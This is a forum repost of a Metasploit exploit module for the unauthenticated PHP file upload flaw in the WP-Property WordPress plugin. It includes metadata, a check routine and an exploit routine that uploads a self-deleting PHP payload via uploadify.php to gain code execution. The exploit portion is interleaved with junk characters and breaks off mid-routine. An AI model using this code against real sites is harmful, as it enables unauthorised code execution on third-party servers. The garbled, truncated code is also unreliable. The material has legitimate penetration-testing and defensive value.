标题: WordPress WP-Property PHP 文件上传漏洞
作者: admin 时间: 2013-1-4 19:51
标题: WordPress WP-Property PHP 文件上传漏洞

WordPress WP-Property PHP 文件上传漏洞

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

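# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description below).
#
# Defensive note: this module requests
# wp-content/plugins/wp-property/third-party/uploadify/uploadify.php under the
# WordPress base path, so requests to that script in web server logs are worth
# reviewing on sites that run the plugin.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The page rendered this constant as "Msf::Exploit:hpEXE" (forum markup ate
  # ":P"); the require of 'msf/core/exploit/php_exe' identifies the PhpEXE mixin.
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (name, description, authors, references,
  # payload constraints, targets) and the TARGETURI option.
  #
  # @param info [Hash] caller-supplied metadata, passed through update_info
  #   together with the values declared here
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          # The payload must not contain a NUL byte.
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        # Base path of the WordPress installation on the target host.
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end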
9 V; |2 O- w( ~
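# Probes for the plugin's bundled uploadify.php script with a single GET request.
#
# A 200 response only shows that the script is reachable under the configured
# WordPress path. It does not establish the installed WP-Property version
# (the module description names <= 1.35.0 as affected) or that the script still
# accepts uploads, so the result is reported as Detected rather than Appears to
# avoid overstating exposure in assessment output. Confirm the installed plugin
# version on the host before treating a site as vulnerable.
#
# @return [Exploit::CheckCode] Unknown when there is no response or the status
#   is not 200; Detected when the script answers with 200
def check
  # Build the base path without mutating the string returned by target_uri.
  base = target_uri.path
  base = "#{base}/" unless base.end_with?('/')

  res = send_request_cgi({
    'method' => 'GET',
    'uri'    => "#{base}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
  })

  # No response, or anything other than 200, tells us nothing about the plugin.
  return Exploit::CheckCode::Unknown unless res && res.code == 200

  Exploit::CheckCode::Detected
end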
def exploit , H+ {5 s; M$ r/ i, X3 Furi = target_uri.path $ y. g! P+ g+ N5 puri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)# a) Z- `8 T+ K
" {8 K* B' X$ M) x" h3 S5 idata = Rex::MIME::Message.new - k+ p& |7 ^0 ^; p2 s4 m3 ?data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")0 d* Z* u! {2 P z/ Y3 w5 Q, S
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"") 7 f6 T+ g: x4 ^0 }post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') 3 g- F8 l9 Y7 z- J+ [ f . E9 q7 M- L) h" o9 e/ tprint_status("#{peer} - Uploading payload #{@payload_name}") 9 K% V) I) m9 U, l0 t. H) jres = send_request_cgi({ 3 M1 r, r: a1 i8 q; q7 E7 i'method' => 'POST',* h' F8 Q! T( _1 s3 u
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", / ?* [, m5 i% M p'ctype' => "multipart/form-data; boundary=#{data.bound}",& ]/ T& x3 U! y
'data' => post_data # z7 ^4 }. f$ X. c' T}) & k) t% N! n2 \3 d5 w% [' i 4 I, m$ V8 K/ j- T) ~if not res or res.code != 200 or res.body !~ /#{@payload_name}/. _5 n. i; U) A' C1 a$ s
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")9 n1 a9 g0 B1 y+ l( y, |. `
end# M5 l+ I; |: I# Q" @
; l8 \ C. r4 c7 }+ T2 h
upload_uri = res.body$ |$ P8 g; F* d1 ]% O+ K0 q